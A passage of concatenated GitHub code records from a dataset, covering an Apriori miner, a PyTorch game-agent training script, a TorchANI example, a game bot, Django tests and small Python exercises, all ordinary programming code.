\")\nunit = input(\"Lbs or kgs \")\n \nif unit.lower() == \"kgs\":\n weight_lbs = float(weight) * 2.20462262185\n print(\"You weigh\", str(weight_lbs) + \" pounds\")\nelse:\n weight_kgs = float(weight) / 2.20462262185\n print(\"You weigh\", str(weight_kgs) + \" kilograms\")\n\n#handling errors\ntry:\n age = int(input(\"Age: \"))\n print(age)\n income = int(input(\"Income: \"))\n risk = income / age\nexcept ZeroDivisionError:\n print(\"Age cannot be zero\")\nexcept ValueError:\n print(\"Invalid value\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Gloriariechi99/MIni-Projects","sub_path":"main4.py","file_name":"main4.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19418357686","text":"\nclass Apriori:\n \"\"\"\n\n \"\"\"\n\n def __init__(self, param: dict):\n self.dbase = param\n self.reset()\n\n def reset(self):\n \"\"\"\n candidates = table TID ensembles d'itemsets\n current = table itemsets TIDs\n \"\"\"\n self.candidates_sz = 1\n self.support_history = {}\n self.candidates = {}\n self.current = {}\n\n for x in self.dbase:\n self.candidates[x] = [(a,) for a in self.dbase[x]]\n\n for x, v in self.candidates.items():\n for itemset in v:\n if itemset in self.current:\n self.current[itemset].add(x)\n else:\n self.current[itemset] = set([x])\n\n def support(self, minsupp: float) -> dict:\n assert 0 <= minsupp <= 1\n \"\"\"on fait le nombre d'occurrences divisées par la taille de la base\n len(dbase) taille de la base \n pr connaitre nb de transactions on calcule la longueur de current(x)\n \"\"\"\n a = {x: len(v) / len(self.dbase) for x, v in self.current.items()}\n return {x: v for x, v in a.items() if v >= minsupp}\n\n def scan_dbase(self, minsupp: float):\n \"\"\"\n mettre à jour support_history avec update en fonction de la\n fréquence en paramètre, mettre à jour current\n \"\"\"\n new_support = self.support(minsupp)\n self.support_history.update(new_support)\n self.current = {x: v for x, v in self.current.items(\n ) if x in new_support.keys()}\n\n def Lk(self) -> list:\n \"\"\"\n renvoie la liste 
list of keys of self.current\n        \"\"\"\n        return sorted(self.current.keys())\n\n    def cross_product(self):\n        Lk = self.Lk()\n        k = self.candidates_sz\n        p = len(self.current)\n\n        futur = {}\n        for i in range(p):\n            for j in range(i+1, p):\n                if (Lk[i][:k-1] == Lk[j][:k-1]):\n                    new = Lk[i] + (Lk[j][-1], )\n                    if all(new[:m]+new[m+1:] in Lk for m in range(k+1)):\n                        tid_i = self.current[Lk[i]]\n                        tid_j = self.current[Lk[j]]\n                        futur[new] = tid_i.intersection(tid_j)\n\n        if futur:\n            self.current = futur\n            self.candidates = {}\n            \n            tids = list({x for v in self.current.values() for x in v})\n            for tid in tids:\n                self.candidates[tid] = [\n                    w for w, v in self.current.items() if tid in v]\n            self.candidates_sz += 1\n\n    def main(self, minsupp: float) -> list:\n        self.reset()\n        main = []\n        sz = self.candidates_sz\n        while sz == self.candidates_sz:\n            self.scan_dbase(minsupp)\n            Lk = list(self.Lk())\n            if Lk:\n                main.append(Lk)\n            self.cross_product()\n            sz += 1\n        return main\n","repo_name":"aymankr/ia-miashs","sub_path":"panier/apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72226357868","text":"import argparse\nimport datetime\nimport logging\nimport math\nimport os\nimport random\nimport sys\n\nimport numpy as np\n\nimport torch\n\nfrom torch import nn\nfrom torch.utils.data import Dataset\nfrom torch.optim import SGD, Adam\nfrom torch.utils.data import DataLoader\n# from torch.utils.tensorboard import SummaryWriter\n\nfrom droidblue.core.basecls import PlayerId\nfrom droidblue.core.agent import RandomAgent\nfrom droidblue.core.game import Game\n\nfrom .battlecruiser import BattleCruiserState, BattleCruiserAgent, BattleCruiserPlaceModel, BattleCruiserShotModel, BattleCruiserShotEdge\n\nlog = logging.getLogger(__name__)\n# log.setLevel(logging.WARN)\nlog.setLevel(logging.INFO)\nlog.setLevel(logging.DEBUG)\n\n\nclass BattleCruiserDataset(Dataset):\n    def __init__(self, event_type, placeModel_path = \"droidblue/games/bc/BattleCruiserPlaceModel-latest.state\", shotModel_path = \"droidblue/games/bc/BattleCruiserShotModel-latest.state\"):\n        self.event_type = event_type\n        self.agents = [\n            BattleCruiserAgent(placeModel_path, shotModel_path),\n            BattleCruiserAgent(placeModel_path, shotModel_path),\n        ]\n\n    def __len__(self):\n        return 128 * 128\n\n    def __getitem__(self, ndx):\n        game = Game(BattleCruiserState, self.agents)\n        game.playGame()\n\n        trainable_nodes = [node for node in game.played_nodes if self.event_type in node.edgeType_to_trainingSample_dict]\n\n        if not trainable_nodes:\n            print(f\"len(game.played_nodes): {len(game.played_nodes)}\")\n            for node in game.played_nodes:\n                print(f\"node.edgeType_to_trainingSample_dict: {node.edgeType_to_trainingSample_dict}\")\n\n        chosen_node = random.choice(trainable_nodes)\n\n        inputs, labels, outputs = chosen_node.edgeType_to_trainingSample_dict[self.event_type]\n\n        final_score = game.current_node.state.getFinalScore(chosen_node.state.active_player)\n        labels.append(np.array([final_score], dtype=np.float32))\n\n        input_tup = tuple(torch.from_numpy(x) for x in inputs)\n        label_tup = tuple(torch.from_numpy(x) for x in labels)\n\n        training_sample = input_tup, label_tup\n\n        return training_sample\n\n\n\n\nclass TrainingApp:\n    def __init__(self, sys_argv=None):\n        if sys_argv is None:\n            sys_argv = sys.argv[1:]\n\n        parser = argparse.ArgumentParser()\n        parser.add_argument('--num-workers',\n                            help='Number of worker processes for background data loading',\n                            
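# Note (added): each DataLoader worker generates samples by playing whole\n                            # BattleCruiser games in BattleCruiserDataset.__getitem__ above, so this\n                            # flag effectively controls how many self-play games run in parallel.\n                            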
default=4,\n type=int,\n )\n parser.add_argument('--batch-size',\n help='Batch size to use for training',\n default=128,\n type=int,\n )\n parser.add_argument('--epochs',\n help='Number of epochs to train for',\n default=30,\n type=int,\n )\n\n parser.add_argument('--tb-prefix',\n default='p2ch11',\n help=\"Data prefix to use for Tensorboard run. Defaults to chapter.\",\n )\n\n parser.add_argument('comment',\n help=\"Comment suffix for Tensorboard run.\",\n nargs='?',\n default='dwlpt',\n )\n self.cli_args = parser.parse_args(sys_argv)\n self.time_str = datetime.datetime.now().strftime('%Y-%m-%d_%H.%M.%S')\n\n self.trn_writer = None\n self.val_writer = None\n self.totalTrainingSamples_count = 0\n\n # self.use_cuda = False\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if self.use_cuda else \"cpu\")\n\n self.model = self.initModel()\n self.optimizer = self.initOptimizer()\n\n def initModel(self):\n model = BattleCruiserShotModel()\n\n if self.use_cuda:\n log.info(\"Using CUDA with {} devices.\".format(torch.cuda.device_count()))\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n model = model.to(self.device)\n return model\n\n def initOptimizer(self):\n # return SGD(self.model.parameters(), lr=0.001, momentum=0.99)\n return Adam(self.model.parameters())\n\n def initTrainDl(self):\n train_ds = BattleCruiserDataset(BattleCruiserShotEdge)\n\n batch_size = self.cli_args.batch_size\n if self.use_cuda:\n batch_size *= torch.cuda.device_count()\n\n train_dl = DataLoader(\n train_ds,\n batch_size=batch_size,\n num_workers=self.cli_args.num_workers,\n pin_memory=self.use_cuda,\n )\n\n return train_dl\n\n def initValDl(self):\n val_ds = BattleCruiserDataset(BattleCruiserShotEdge)\n\n batch_size = self.cli_args.batch_size\n if self.use_cuda:\n batch_size *= torch.cuda.device_count()\n\n val_dl = DataLoader(\n val_ds,\n batch_size=batch_size,\n num_workers=self.cli_args.num_workers,\n pin_memory=self.use_cuda,\n )\n\n return val_dl\n\n # def initTensorboardWriters(self):\n # if self.trn_writer is None:\n # log_dir = os.path.join('runs', self.cli_args.tb_prefix, self.time_str)\n #\n # self.trn_writer = SummaryWriter(\n # log_dir=log_dir + '-trn_cls-' + self.cli_args.comment)\n # self.val_writer = SummaryWriter(\n # log_dir=log_dir + '-val_cls-' + self.cli_args.comment)\n\n\n def main(self):\n log.info(\"Starting {}, {}\".format(type(self).__name__, self.cli_args))\n\n train_dl = self.initTrainDl()\n val_dl = self.initValDl()\n\n # self.initTensorboardWriters()\n\n epoch_ndx = None\n for epoch_ndx in range(1, self.cli_args.epochs + 1):\n\n log.info(\"Epoch {} of {}, {}/{} batches of size {}*{}\".format(\n epoch_ndx,\n self.cli_args.epochs,\n len(train_dl),\n len(val_dl),\n self.cli_args.batch_size,\n (torch.cuda.device_count() if self.use_cuda else 1),\n ))\n\n self.doTraining(epoch_ndx, train_dl)\n # self.logMetrics(epoch_ndx, 'trn', trnMetrics_t)\n\n # self.doValidation(epoch_ndx, val_dl)\n # self.logMetrics(epoch_ndx, 'val', valMetrics_t)\n\n # if hasattr(self, 'trn_writer'):\n # self.trn_writer.close()\n # self.val_writer.close()\n\n state = {\n 'sys_argv': sys.argv,\n 'time': str(datetime.datetime.now()),\n 'model_state': self.model.state_dict(),\n 'model_name': type(self.model).__name__,\n 'optimizer_state' : self.optimizer.state_dict(),\n 'optimizer_name': type(self.optimizer).__name__,\n 'epoch': epoch_ndx,\n # 'totalTrainingSamples_count': self.totalTrainingSamples_count,\n }\n save_path = 
f\"droidblue/games/bc/{type(self.model).__name__}-0vs0-v1.state\"\n last_path = f\"droidblue/games/bc/{type(self.model).__name__}-latest.state\"\n torch.save(state, save_path)\n torch.save(state, last_path)\n\n agents = [\n BattleCruiserAgent(None, save_path),\n RandomAgent(),\n ]\n wins = 0\n games = 100\n\n for i in range(games):\n game = Game(BattleCruiserState, agents)\n game.playGame()\n\n wins += game.current_node.state.getFinalScore(PlayerId(0)) > 0\n\n log.info(f\"wins: {wins}\")\n\n\n def doTraining(self, epoch_ndx, train_dl):\n self.model.train()\n # trnMetrics_g = torch.zeros(\n # METRICS_SIZE,\n # len(train_dl.dataset),\n # device=self.device,\n # )\n\n # batch_iter = enumerateWithEstimate(\n # train_dl,\n # \"E{} Training\".format(epoch_ndx),\n # start_ndx=train_dl.num_workers,\n # )\n # for batch_ndx, batch_tup in batch_iter:\n total_loss = 0.0\n for batch_ndx, batch_tup in enumerate(train_dl):\n self.optimizer.zero_grad()\n\n input_tup, label_tup = batch_tup\n\n input_gtup = tuple(x.to(self.device, non_blocking=True) for x in input_tup)\n label_gtup = tuple(x.to(self.device, non_blocking=True) for x in label_tup)\n\n output_g = self.model(*input_gtup)\n\n loss_func = nn.MSELoss()\n loss_g = loss_func(\n output_g[0],\n label_gtup[0],\n )\n\n loss_g.backward()\n self.optimizer.step()\n\n total_loss += loss_g.item()\n\n log.info(f\"Training loss: {total_loss}\")\n\n\n def doValidation(self, epoch_ndx, val_dl):\n self.model.eval()\n # trnMetrics_g = torch.zeros(\n # METRICS_SIZE,\n # len(train_dl.dataset),\n # device=self.device,\n # )\n\n # batch_iter = enumerateWithEstimate(\n # train_dl,\n # \"E{} Training\".format(epoch_ndx),\n # start_ndx=train_dl.num_workers,\n # )\n # for batch_ndx, batch_tup in batch_iter:\n with torch.no_grad():\n for batch_ndx, batch_tup in enumerate(val_dl):\n input_tup, label_tup, metadata_tup = batch_tup\n\n input_t = input_tup[0]\n label_t = label_tup[0]\n\n input_g = input_t.to(self.device, non_blocking=True)\n label_g = label_t.to(self.device, non_blocking=True)\n\n output_g = self.model(input_g)\n\n loss_func = nn.MSELoss()\n loss_g = loss_func(\n output_g,\n label_g,\n )\n\n\n print(\"Validation loss:\", loss_g.item())\n\nif __name__ == '__main__':\n TrainingApp().main()\n","repo_name":"elistevens/xwing-droidblue","sub_path":"droidblue/games/bc/battlecruiser_training_place.py","file_name":"battlecruiser_training_place.py","file_ext":"py","file_size_in_byte":9767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19366066709","text":"# -*- coding: utf-8 -*-\n\"\"\"\nComputing Energy and Force Using Builtin Models\n===============================================\n\nTorchANI has a model ensemble trained by NeuroChem on the `ANI-1x dataset`_.\nThese models are shipped with TorchANI and can be used directly.\n\n.. _ANI-1x dataset:\n https://aip.scitation.org/doi/abs/10.1063/1.5023802\n\"\"\"\n\n###############################################################################\n# To begin with, let's first import the modules we will use:\nimport torch\nimport torchani\n\n###############################################################################\n# Let's now manually specify the device we want TorchANI to run:\ndevice = torch.device('cpu')\n\n###############################################################################\n# Let's now load the built-in models and create a pipeline of AEV computer,\n# neural networks, and energy shifter. 
This pipeline will first compute AEV,\n# then use all models in the ensemble to compute molecular energies, and take\n# the average of these energies to obtain a final output. The reason we need an\n# energy shifter in the end is that the output of these networks is not the\n# total energy but the total energy subtracted by a self energy for each atom.\nbuiltin = torchani.neurochem.Builtins()\nmodel = torch.nn.Sequential(\n builtin.aev_computer,\n builtin.models,\n builtin.energy_shifter\n)\n\n###############################################################################\n# Now let's define the coordinate and species. If you just want to compute the\n# energy and force for a single structure like in this example, you need to\n# make the coordinate tensor has shape ``(1, Na, 3)`` and species has shape\n# ``(1, Na)``, where ``Na`` is the number of atoms in the molecule, the\n# preceding ``1`` in the shape is here to support batch processing like in\n# training. If you have ``N`` different structures to compute, then make it\n# ``N``.\ncoordinates = torch.tensor([[[0.03192167, 0.00638559, 0.01301679],\n [-0.83140486, 0.39370209, -0.26395324],\n [-0.66518241, -0.84461308, 0.20759389],\n [0.45554739, 0.54289633, 0.81170881],\n [0.66091919, -0.16799635, -0.91037834]]],\n requires_grad=True, device=device)\nspecies = builtin.consts.species_to_tensor('CHHHH').to(device).unsqueeze(0)\n\n###############################################################################\n# Now let's compute energy and force:\n_, energy = model((species, coordinates))\nderivative = torch.autograd.grad(energy.sum(), coordinates)[0]\nforce = -derivative\n\n###############################################################################\n# And print to see the result:\nprint('Energy:', energy.item())\nprint('Force:', force.squeeze())\n","repo_name":"0ut0fcontrol/torchani","sub_path":"examples/energy_force.py","file_name":"energy_force.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"7970075549","text":"from app.models import db, Comment\n\n\ndef seed_comments():\n comment1 = Comment(\n comment='Wow, amazing track!',\n song_id=1,\n user_id=1\n )\n comment2 = Comment(\n comment='Outstanding',\n song_id=2,\n user_id=1\n )\n comment3 = Comment(\n comment='This one is my absolute favorite!',\n song_id=3,\n user_id=1\n )\n comment4 = Comment(\n comment='Good stuff',\n song_id=4,\n user_id=1\n )\n db.session.add(comment1)\n db.session.add(comment2)\n db.session.add(comment3)\n db.session.add(comment4)\n db.session.commit()\n\n\ndef undo_comments():\n db.session.execute('TRUNCATE comments RESTART IDENTITY CASCADE;')\n db.session.commit()\n","repo_name":"nathanblaz/tunevillage-app","sub_path":"app/seeds/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"69876989867","text":"import sys\nimport math\n\n\n# Grab Snaffles and try to throw them through the opponent's goal!\n# Move towards a Snaffle and use your team id to determine where you need to throw it.\n\nclass Point2D(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def square_distance(self, other_point):\n \"\"\" Calculates the square distance between this Point2D and another Point2D\n\n :param other_point: The other Point2D\n :return: The Square Distance\n :rtype: float\n \"\"\"\n return (self.x - other_point.x) ** 2 + (self.y - 
other_point.y) ** 2\n\n    def __eq__(self, other_point):\n        \"\"\" Override the equals operator to compare coordinates\n\n        :param other_point: The other Point2D\n        :return: True if points are equal else False\n        :type: bool\n        \"\"\"\n        return self.x == other_point.x and self.y == other_point.y\n\n    def to_dict(self):\n        \"\"\" Converts point to python dict\n\n        :return: dict of x,y coordinates\n        :rtype: dict\n        \"\"\"\n        return {\"x\": self.x, \"y\": self.y}\n\n    def slope(self, other_point):\n        \"\"\" Calculates the slope between this point and another Point2D\n\n        :param other_point: The other point to find the slope with\n        :return: Slope as a float\n        \"\"\"\n        # TODO Find a better way to handle this error\n        if self.x == other_point.x:\n            raise ValueError(\"slope is undefined for a vertical line\")\n        # cast to float just in case there is an integer passed in\n        return (self.y - other_point.y) / float(self.x - other_point.x)\n\n    def angle_deg(self, other_point):\n        \"\"\" Calculates the angle in degrees between this point and another Point2D\n\n        :param other_point: The other Point2D\n        :return: The angle in Degrees\n        \"\"\"\n        if self.x != other_point.x:\n            return 180 * math.atan(other_point.slope(self)) / math.pi\n\n        return 90 if other_point.y > self.y else -90\n\n    def pos_angle_deg(self, other_point):\n        angle = self.angle_deg(other_point)\n        return angle if angle >= 0 else angle + 180.0\n\n    def __str__(self):\n        return \"Point2D({},{})\".format(self.x, self.y)\n\n    def __add__(self, other):\n        if type(other) == type(self):\n            return Point2D(self.x + other.x, self.y + other.y)\n        else:\n            return Point2D(self.x + other, self.y + other)\n\n    def __radd__(self, other):\n        return Point2D.__add__(self, other)\n\n    @staticmethod\n    def find_distance(point1, point2):\n        \"\"\" finds the distance between points\n\n        :param point1:\n        :param point2:\n        :return:\n        \"\"\"\n        result = math.sqrt(point2.square_distance(point1))\n        return result\n\n\nclass Entity(object):\n    def __init__(self, position: Point2D, velocity: Point2D, state: int, entity_id: int):\n        self.position = position\n        self.velocity = velocity\n        self.state = state\n        self.entity_id = entity_id\n        self.velocity_position = self.position + self.velocity\n        self.guardian = False\n        self.attacker = True\n\n    def find_distance(self, entity2):\n        \"\"\" finds the distance between points\n\n        :param entity2:\n        :return:\n        \"\"\"\n        return Point2D.find_distance(self.position, entity2.position)\n\n    def find_angle(self, entity2):\n        a_b = self.find_distance(entity2)\n        a_c = Point2D.find_distance(self.position, self.velocity_position)\n        b_c = Point2D.find_distance(entity2.position, self.velocity_position)\n        # print(\"Debug messages...\", a_b, a_c, b_c, file=sys.stderr)\n        if (-2 * a_c * a_b * b_c) == 0:\n            return math.pi\n        else:\n            top = ((b_c ** 2) - (a_c ** 2) - (a_b ** 2))\n            bottom = (-2 * a_c * a_b)\n            # print(\"Debug messages...\", top, bottom, file=sys.stderr)\n\n            angle_a = math.acos(top / bottom)\n            return angle_a\n\n    def find_thrust(self, entity2):\n        thrust_ = abs(int(math.cos(self.find_angle(entity2)) * 150))\n        return thrust_\n\n\ndef find_closest(entity1, entity_dict, key):\n    itr = 0\n    lowest = None\n    place = 0\n    for j in entity_dict.get(key):\n        low_check = entity1.find_distance(j)\n        # print(\"Debug messages...D\", key, low_check, file=sys.stderr)\n        if (lowest is None or low_check < lowest):\n            place = itr\n            lowest = low_check\n        itr += 1\n    ent = entity_dict.get(key)[place]\n    return ent, lowest\n\n\nmy_team_id = int(input())  # if 0 you need to score on the right of the map, if 1 you need to score on the left\nmy_goal = Point2D(0, 3750) if my_team_id == 0 
else Point2D(16000, 3750)\nobliv_count = 5\ncast_obliv = False\nmana = 0\ncntr_pt = Point2D(8000, 3750)\n# game loop\nwhile True:\n mana += 1\n my_score, my_magic = [int(i) for i in input().split()]\n opponent_score, opponent_magic = [int(i) for i in input().split()]\n entities = int(input()) # number of entities still in game\n entity_dict = {\n \"WIZARD\": [],\n \"OPPONENT_WIZARD\": [],\n \"SNAFFLE\": [],\n \"BLUDGER\": []\n }\n if obliv_count == 5:\n cast_obliv = False\n else:\n obliv_count += 1\n\n for i in range(entities):\n # entity_id: entity identifier\n # entity_type: \"WIZARD\", \"OPPONENT_WIZARD\" or \"SNAFFLE\" (or \"BLUDGER\" after first league)\n # x: position\n # y: position\n # vx: velocity\n # vy: velocity\n # state: 1 if the wizard is holding a Snaffle, 0 otherwise\n magic = False\n entity_id, entity_type, x, y, vx, vy, state = input().split()\n entity_id = int(entity_id)\n x = int(x)\n y = int(y)\n vx = int(vx)\n vy = int(vy)\n state = int(state)\n # print(\"Debug messages...\", entity_type, x, y, file=sys.stderr)\n entity_dict[entity_type].append(Entity(Point2D(x, y), Point2D(vx, vy), state, entity_id))\n # print(\"Debug messages...\", entity_dict, file=sys.stderr)\n if len(entity_dict.get(\"SNAFFLE\")) == 1:\n if Point2D.find_distance(entity_dict.get(\"WIZARD\")[0].position, my_goal) <= Point2D.find_distance(\n entity_dict.get(\"WIZARD\")[1].position, my_goal):\n entity_dict.get(\"WIZARD\")[0].guardian = True\n entity_dict.get(\"WIZARD\")[1].guardian = False\n else:\n entity_dict.get(\"WIZARD\")[1].guardian = True\n entity_dict.get(\"WIZARD\")[0].guardian = False\n for i in range(2):\n\n wiz = entity_dict.get(\"WIZARD\")[i]\n\n # Write an action using print\n # To debug: print(\"Debug messages...\", file=sys.stderr)\n if wiz.state == 0 and not wiz.guardian:\n nearest_snaffle, nearest_snaffle_dist = find_closest(wiz, entity_dict, \"SNAFFLE\")\n nearest_bludger, nearest_bludger_dist = find_closest(wiz, entity_dict, 'BLUDGER')\n nearest_other_wiz, nearest_other_wiz_dist = find_closest(wiz, entity_dict, \"OPPONENT_WIZARD\")\n # print(\"Debug messages...\", nearest_bludger, nearest_snaffle_dist, nearest_bludger_dist, nearest_other_wiz_dist, file=sys.stderr)\n if (mana > 25 or (mana % 17 == 0 and mana != 0)) and (\n (nearest_snaffle_dist > 5222) or len(entity_dict.get(\"SNAFFLE\")) <= 2) and magic == False:\n magic = True\n print(\"ACCIO \" + str(nearest_snaffle.entity_id))\n mana -= 15\n elif (mana > 32 or (mana % 22 == 0 and mana != 0)) and (\n nearest_snaffle_dist > nearest_other_wiz.find_distance(nearest_snaffle)):\n magic = True\n mana -= 20\n print(\"FLIPENDO \" + str(nearest_other_wiz.entity_id))\n elif (mana > 32 or (mana % 22 == 0 and mana != 0)) and (nearest_bludger_dist < 3000):\n magic = True\n mana -= 20\n print(\"FLIPENDO \" + str(nearest_bludger.entity_id))\n elif (mana > 25 or (mana % 17 == 0 and mana != 0)) and (\n nearest_snaffle_dist > nearest_other_wiz.find_distance(nearest_snaffle)) and magic == False:\n magic = True\n print(\"ACCIO \" + str(nearest_snaffle.entity_id))\n mana -= 15\n elif (mana > 22 or (mana % 12 == 0 and mana != 0)) and magic == False and nearest_other_wiz_dist < 5222:\n magic = True\n mana -= 10\n print(\"PETRIFICUS \" + str(nearest_other_wiz.entity_id))\n elif (((mana % 6 == 0 and mana != 0 and nearest_bludger_dist <= 3000) or (\n mana > 16 and nearest_bludger_dist <= 5222)) and nearest_bludger_dist < nearest_other_wiz_dist) and cast_obliv == False:\n obliv_count = 0\n cast_obliv = True\n # magic = True\n print(\"OBLIVIATE \" + 
str(nearest_bludger.entity_id))\n                mana -= 5\n            else:\n                itr = 0\n                lowest = None\n                place = 0\n                for j in entity_dict.get(\"SNAFFLE\"):\n                    low_check = wiz.find_distance(j)\n                    if (lowest is None or low_check < lowest) and j.state == 0:\n                        place = itr\n                        lowest = low_check\n                    itr += 1\n                ent = entity_dict.get(\"SNAFFLE\")[place]\n                thrust = entity_dict.get(\"WIZARD\")[i].find_thrust(ent)\n                # print(\"Debug messages...\", thrust, file=sys.stderr)\n                print(\"MOVE \" + str(ent.velocity_position.x) + \" \" + str(ent.velocity_position.y) + \" \" + str(150))\n        elif wiz.guardian:\n            nearest_snaffle, nearest_snaffle_dist = find_closest(wiz, entity_dict, \"SNAFFLE\")\n            nearest_bludger, nearest_bludger_dist = find_closest(wiz, entity_dict, 'BLUDGER')\n            nearest_other_wiz, nearest_other_wiz_dist = find_closest(wiz, entity_dict, \"OPPONENT_WIZARD\")\n            if entity_dict.get(\"WIZARD\")[i].state == 1:\n                if Point2D.find_distance(cntr_pt, entity_dict.get(\"WIZARD\")[i].position) > Point2D.find_distance(\n                        entity_dict.get(\"WIZARD\")[i].position, entity_dict.get(\"WIZARD\")[i - 1].position):\n                    print(\"THROW \" + str(entity_dict.get(\"WIZARD\")[i - 1].position.x) + \" \" + str(\n                        entity_dict.get(\"WIZARD\")[i - 1].position.y) + \" \" + \"500\")\n                else:\n                    if my_team_id == 0:\n                        print(\"THROW \" + str(16000) + \" \" + str(3750) + \" \" + \"500\")\n                    else:\n                        print(\"THROW \" + str(0) + \" \" + str(3750) + \" \" + \"500\")\n            elif (mana > 32 or (mana % 22 == 0 and mana != 0)) and (\n                    nearest_snaffle_dist > nearest_other_wiz.find_distance(nearest_snaffle)):\n                # magic = True\n                mana -= 20\n                print(\"FLIPENDO \" + str(nearest_other_wiz.entity_id))\n            elif (mana > 22 or (mana % 12 == 0 and mana != 0)) and nearest_other_wiz.find_distance(\n                    nearest_snaffle) < 5222:\n                # magic = True\n                mana -= 10\n                print(\"PETRIFICUS \" + str(nearest_other_wiz.entity_id))\n            elif nearest_snaffle_dist < 5000:\n                print(\"MOVE \" + str(nearest_snaffle.velocity_position.x) + \" \" + str(\n                    nearest_snaffle.velocity_position.y) + \" \" + str(150))\n            else:\n                if my_team_id == 0:\n                    print(\"MOVE \" + str(122) + \" \" + str(3750) + \" \" + \"150\")\n                else:\n                    print(\"MOVE \" + str(15878) + \" \" + str(3750) + \" \" + \"150\")\n        elif entity_dict.get(\"WIZARD\")[i].state == 1:\n            if my_team_id == 0:\n                print(\"THROW \" + str(16000) + \" \" + str(3750) + \" \" + \"500\")\n            else:\n                print(\"THROW \" + str(0) + \" \" + str(3750) + \" \" + \"500\")\n        else:\n            print(\"MOVE 8000 3750 100\")\n        # Edit this line to indicate the action for each wizard (0 ≤ thrust ≤ 150, 0 ≤ power ≤ 500)\n        # i.e.: \"MOVE x y thrust\" or \"THROW x y power\"\n\n","repo_name":"DarkPhoenix6/My_Libraries","sub_path":"Python/codeingames/fantastic_bits.py","file_name":"fantastic_bits.py","file_ext":"py","file_size_in_byte":12019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30673134701","text":"from django.test import TestCase, Client\nfrom .models import Question, Answer\nfrom django.contrib.auth.models import User\n# Create your tests here.\n\nclass MainTestCase(TestCase) :\n    def test_url (self) :\n        response2 = Client().get(\"/question/\")\n        self.assertEqual(response2.status_code,200)\n\n        response3 = Client().get(\"/question/1/\")\n        self.assertEqual(response3.status_code,200)\n\n        response = Client().get(\"/question/all?q=\")\n        self.assertEqual(response.status_code, 200)\n\n\n    def test_model (self) :\n        user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888')\n        ans = Answer.objects.create(user=user, answer='ini jawabannya')\n        
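# Note (added): Question.answer is assumed to be a many-to-many style relation\n        # to Answer (it is attached via .add() below), so the Answer row is created\n        # first and then linked to the Question.\n        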
Question.objects.create(user=user, question='ini pertanyaan')\n        Question.objects.get(pk=1).answer.add(ans)\n\n        self.assertEqual(1, Question.objects.count())\n        self.assertEqual(1, Answer.objects.count())\n\n    def test_template_used(self) :\n        response = Client().get(\"/question/\")\n        self.assertTemplateUsed(response, \"pertanyaan/pertanyaan.html\")\n\n        response2 = Client().get(\"/question/1/\")\n        self.assertTemplateUsed(response2,\"pertanyaan/detail.html\")\n    \n    def test_element_in_template(self) :\n        user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888')\n        ans = Answer.objects.create(user=user, answer='ini jawabannya')\n        Question.objects.create(user=user, question='ini pertanyaan')\n        Question.objects.get(pk=1).answer.add(ans)\n\n        response = Client().get(\"/question/\")\n        html_response = response.content.decode('utf8')\n        self.assertIn(\"ini pertanyaan\", html_response)\n\n\n        response = Client().get(\"/question/1/\")\n        html_response = response.content.decode('utf8')\n        self.assertIn(\"ini jawabannya\", html_response)\n\n    def test_search(self) :\n        user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888')\n        Question.objects.create(user=user, question='ini pertanyaan')\n        response = self.client.get('/question/', data={'search' : \"ini\"})\n        html_response = response.content.decode('utf8')\n        self.assertIn(\"ini\", html_response)\n\n        response = self.client.get('/question/', data={'search' : \"itu\"})\n        html_response = response.content.decode('utf8')\n        self.assertIn(\"There are no question\", html_response)\n\n\n    def test_menjawab(self) :\n        user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888') # create user\n        Question.objects.create(user=user, question='ini pertanyaan') # create question\n\n        # test answering a question when the user is logged in\n        self.client.login(username='testing', password='testing8888') # login user\n        response = self.client.post('/question/1/', data={\"addAnswer\" : \"mauTanya\", \"answer\" : \"ini pertanyaan\", \"addAnswer\" : \"add\" })\n        self.assertEqual(Question.objects.get(pk=1).answer.all()[0].answer, \"ini pertanyaan\")\n\n\n        # test answering a question when the user is logged out\n        self.client.logout()\n        response = self.client.post('/question/1/', data={\"addAnswer\" : \"add\" })\n        self.assertEqual(response.status_code, 302)\n\n\n    def test_bertanya(self) :\n        user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888') # create user\n        # test asking a question when the user is logged in\n        self.client.login(username='testing', password='testing8888') # login user\n        response = self.client.post('/question/add/', data={\"question\" : \"ini pertanyaan\", \"addQuestion\" : \"add\" })\n        self.assertEqual(Question.objects.get(question='ini pertanyaan').question, \"ini pertanyaan\")\n\n        self.client.logout()\n        response = self.client.post('/question/', data={\"addQuestion\" : \"add\" })\n        self.assertEqual(response.status_code, 302)\n\n    \n\n\n\n    \n\n\n","repo_name":"SinusCosinusTangen/donasi-covid-19-2","sub_path":"pertanyaan/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4274494277","text":"import sys\n\nsys.setrecursionlimit(2000)\nprint(sys.getrecursionlimit())\n\ndef greet(): # function calling itself is known as recursion\n    print('hello')\n    greet()\n\n#greet() \n\n# 5! 
